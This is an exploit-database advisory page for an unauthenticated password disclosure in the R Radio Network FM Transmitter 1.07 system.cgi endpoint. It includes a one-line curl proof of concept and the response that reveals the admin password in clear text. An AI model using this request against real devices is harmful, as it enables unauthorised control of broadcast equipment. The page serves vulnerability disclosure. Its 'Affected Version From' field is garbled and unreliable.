header-logo
Suggest Exploit
vendor:
FM Transmitter
by:
Gjoko 'LiquidWorm' Krstic
6.1
CVSS
HIGH
Password Disclosure
200
CWE
Product Name: FM Transmitter
Affected Version From: 1.7.2024
Affected Version To: 01.07
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested: CSBtechDevice
2023

R Radio Network FM Transmitter 1.07 system.cgi Password Disclosure

The R Radio Network FM Transmitter 1.07 system.cgi endpoint has an improper access control issue that allows unauthenticated users to access and view the clear-text password of the admin user, enabling them to bypass authentication and access FM station setup.

Mitigation:

To mitigate this vulnerability, it is recommended to restrict access to the system.cgi endpoint to authorized users only and ensure strong password policies are in place.
Source

Exploit-DB raw data:

R Radio Network FM Transmitter 1.07 system.cgi Password Disclosure


Vendor: R Radio Network
Product web page: http://www.pktc.ac.th
Affected version: 1.07

Summary: R Radio FM Transmitter that includes FM Exciter and
FM Amplifier parameter setup.

Desc: The transmitter suffers from an improper access control
that allows an unauthenticated actor to directly reference the
system.cgi endpoint and disclose the clear-text password of the
admin user allowing authentication bypass and FM station setup
access.

Tested on: CSBtechDevice


Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
                            @zeroscience


Advisory ID: ZSL-2023-5802
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2023-5802.php


09.10.2023

--


$ curl -s http://192.168.70.12/system.cgi
<html><head><title>System Settings</title>
...
...
Password for user 'admin'</td><td><input type=password name=pw size=10 maxlength=10 value="testingus"></td>
...
...
$